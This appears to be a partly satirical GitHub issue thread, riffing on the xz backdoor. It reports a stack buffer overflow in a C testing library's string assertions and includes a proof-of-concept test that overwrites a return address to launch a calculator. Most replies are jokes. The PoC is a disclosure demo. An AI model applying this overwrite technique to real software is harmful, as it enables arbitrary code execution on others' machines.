Exploitable stack buffer overflow

[msftedge]

Good afternoon,

There is a stack-based buffer overflow vulnerability in various functions of this library, including stest_assert_string_equal and assert_n_array_equal. If the library is used to test untrusted input (for example, a file you found in tukaani-project/xz) a devious individual would be able to construct a malicious file to achieve arbitrary code execution on anyone running the tests.

I have included an example of how it might look on x86_64 Linux. Here as an example I hijack the return to go to a predefined function, but of course you could ROP instead.

#include "../src/stest.h"
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>
#include <stddef.h>
#include <memory.h>

#define without_logging(X) stest_disable_logging(); X; stest_enable_logging();
#define assert_test_passes(X) without_logging(X); stest_assert_last_passed(__FUNCTION__, __LINE__);
#define assert_test_fails(X) without_logging(X); stest_assert_last_failed(__FUNCTION__, __LINE__);

static void example() {
  execl("/usr/bin/gnome-calculator", "gnome-calculator", NULL);
}

static void test_stack_nuke() {
  // E.g. read a wholesome file provided kindly by the XZ maintainer
  static char untrusted_input[10100] = {0};
  memset(untrusted_input, 'A', 10000);
  *(uint64_t*)&untrusted_input[10000] = example;

  // What could go wrong
  assert_test_fails(assert_string_equal(NULL, untrusted_input));
}

void test_fixture_stest() {
  test_fixture_start();
  run_test(test_stack_nuke);
  test_fixture_end();
}

int main(int argc, char **argv) {
  return stest_testrunner(argc, argv, test_fixture_stest, NULL, NULL);
}

I trust you will fix this issue promptly, I am sure security is a high priority.

[dandykong]

// E.g. read a wholesome file provided kindly by the XZ maintainer

Is this the same exact payload used to backdoor xz?

[vilari-mickopf]

Is this exploit applicable to any linux, or does it only target debian/redhat distributions?

[64ArthurAraujo]

Is this exploit applicable to any linux, or does it only target debian/redhat distributions?

xz-utils version 5.6.0 and 5.6.1 are compromised, if you are not using debian sid or other bleeding edge distro you should be fine.

[vilari-mickopf]

@64ArthurAraujo
It was just a joke about this issue because the entire issue is itself a joke.

[64ArthurAraujo]

@64ArthurAraujo
It was just a joke about this issue because the entire issue is itself a joke.

i tought you were asking about the xz vulnerability lol

[SnzFor16Min]

Good second issue! Unfortunately the maintainer would have considered this as a great new feature.

[vilari-mickopf]

lgtm

[levizoesch]

Damn, he was just trying to make sure he can get a hold of you about your cars extended warranty...

[nb-programmer]

Don't worry, we'll just raise a PR in oss-fuzz to skip checking for stack buffer overflow in this repo :)

[danielgran]

LGTM